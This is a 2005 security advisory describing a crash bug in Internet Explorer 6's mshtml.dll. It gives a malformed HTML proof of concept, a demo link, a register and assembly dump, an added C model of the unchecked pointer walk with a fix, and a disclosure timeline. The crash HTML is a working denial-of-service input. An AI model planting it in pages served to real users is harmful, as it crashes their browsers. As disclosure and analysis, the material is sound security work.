
[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #5     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Read Dereference)      |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6c74b1
===================

The following HTML code forces M$ IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html

These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000246

        7d6c748b 6a0b             push    0xb
        7d6c748d 33c0             xor     eax,eax
        7d6c748f 59               pop     ecx
        7d6c7490 8bfe             mov     edi,esi
        7d6c7492 f3ab             rep     stosd
        7d6c7494 8b45f8           mov     eax,[ebp-0x8]
        7d6c7497 8906             mov     [esi],eax
        7d6c7499 897228           mov     [edx+0x28],esi
        7d6c749c e9af010000       jmp     mshtml+0x217650 (7d6c7650)
        7d6c74a1 8b4728           mov     eax,[edi+0x28]
        7d6c74a4 8b7028           mov     esi,[eax+0x28]
        7d6c74a7 897728           mov     [edi+0x28],esi
        7d6c74aa 8b4320           mov     eax,[ebx+0x20]
        7d6c74ad 668b4002         mov     ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24           mov     ecx,[esi+0x24]
                                          ds:0023:00000024=????????
        7d6c74b4 66250030         and     ax,0x3000
        7d6c74b8 662d0010         sub     ax,0x1000
        7d6c74bc 66f7d8           neg     ax
        7d6c74bf 897510           mov     [ebp+0x10],esi
        7d6c74c2 1bc0             sbb     eax,eax
        7d6c74c4 40               inc     eax
        7d6c74c5 50               push    eax
        7d6c74c6 e80c8efeff       call    mshtml+0x2002d7 (7d6b02d7)
        7d6c74cb 0fb6c0           movzx   eax,al
        7d6c74ce 48               dec     eax
        7d6c74cf 83f80c           cmp     eax,0xc
        7d6c74d2 0f877b010000     jnbe    mshtml+0x217653 (7d6c7653)
        7d6c74d8 ff2485c7796c7d   jmp     dword ptr [mshtml+0x2179c7
                                          (7d6c79c7)+eax*4]
        7d6c74df 8b4e20           mov     ecx,[esi+0x20]
        7d6c74e2 f6410208         test    byte ptr [ecx+0x2],0x8
        7d6c74e6 7419             jz      mshtml+0x217501 (7d6c7501)
        7d6c74e8 8b45fc           mov     eax,[ebp-0x4]
        7d6c74eb ff7014           push    dword ptr [eax+0x14]
        7d6c74ee 8b4610           mov     eax,[esi+0x10]
        7d6c74f1 03460c           add     eax,[esi+0xc]
        7d6c74f4 50               push    eax
        7d6c74f5 e899ba0100       call    mshtml+0x232f93 (7d6e2f93)

With esi at zero, the faulting instruction reads from address 0x24 in the
unmapped null page (ds:0023:00000024 above). It appears to be a plain
null-pointer read, so the result is a crash (denial of service) rather than
anything exploitable for code execution.
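As an added illustration (not code from the advisory or from Microsoft), the
following C model reproduces the pointer-chain walk visible in the dump: the
context's 0x28 field is replaced by its successor's 0x28 field
(mov eax,[edi+0x28] / mov esi,[eax+0x28] / mov [edi+0x28],esi) and the new
node's 0x24 field is then read (mov ecx,[esi+0x24]) without an end-of-chain
check, beside a hardened form that checks for NULL. The structure, field
names, offsets, and the sample chain are assumptions chosen only to match the
disassembly above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical node layout (assumption): only the two offsets seen in the
 * dump matter, the 0x24 field that the faulting mov reads and the 0x28
 * pointer that turns out to be NULL. */
struct layout_node {
    uint8_t  pad[0x24];
    uint32_t type;              /* offset 0x24: read by mov ecx,[esi+0x24] */
    struct layout_node *next;   /* offset 0x28: read/written via [reg+0x28] */
};
_Static_assert(offsetof(struct layout_node, type) == 0x24, "type at 0x24");
_Static_assert(offsetof(struct layout_node, next) == 0x28, "next at 0x28");

/* Constructed sample input: a context whose chain has three nodes. */
#define CHAIN_LEN 3
static struct layout_node pool[CHAIN_LEN];
static struct layout_node ctx_storage;

struct layout_node *build_chain(void)
{
    for (int i = 0; i < CHAIN_LEN; i++) {
        pool[i].type = 0x1000u + (uint32_t)i;
        pool[i].next = (i + 1 < CHAIN_LEN) ? &pool[i + 1] : NULL;
    }
    ctx_storage.type = 0;
    ctx_storage.next = &pool[0];
    return &ctx_storage;
}

/* Mirrors 7d6c74a1..7d6c74b1: step the context to the following node and
 * read its type. With a NULL successor this reads address 0x24, which is the
 * access violation shown in the dump (a read from the unmapped null page,
 * i.e. a crash only). */
uint32_t advance_unchecked(struct layout_node *ctx)
{
    struct layout_node *cur  = ctx->next;   /* mov eax,[edi+0x28]   */
    struct layout_node *succ = cur->next;   /* mov esi,[eax+0x28]   */
    ctx->next = succ;                       /* mov [edi+0x28],esi   */
    return succ->type;                      /* mov ecx,[esi+0x24]   <- FAULT if succ == NULL */
}

/* Hardened form: a NULL successor is treated as end of chain.
 * Returns 1 and stores the type when a node was reached, 0 when the chain
 * is exhausted on this step, -1 when there was nothing left to step from. */
int advance_checked(struct layout_node *ctx, uint32_t *type_out)
{
    if (ctx == NULL || ctx->next == NULL)
        return -1;
    struct layout_node *succ = ctx->next->next;
    ctx->next = succ;
    if (succ == NULL)
        return 0;                           /* report, do not dereference */
    *type_out = succ->type;
    return 1;
}

int main(void)
{
    uint32_t t = 0;
    struct layout_node *ctx = build_chain();
    /* Two unchecked steps succeed; a third would dereference NULL->type. */
    printf("unchecked: 0x%x 0x%x\n", advance_unchecked(ctx), advance_unchecked(ctx));

    ctx = build_chain();
    for (int rc; (rc = advance_checked(ctx, &t)) >= 0; )
        printf("checked: rc=%d type=0x%x\n", rc, rc == 1 ? t : 0u);
    return 0;
}
```

The unchecked walk is the pattern in the dump: the step that writes the
successor back into the context's 0x28 slot happens before anyone verifies
that the successor exists, so the malformed tag sequence only has to produce
a chain that ends one node earlier than the code expects.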


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6     - Win 2k SP4


o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@xxxxxxxxxx>

- --

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address, so it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-----END PGP SIGNATURE-----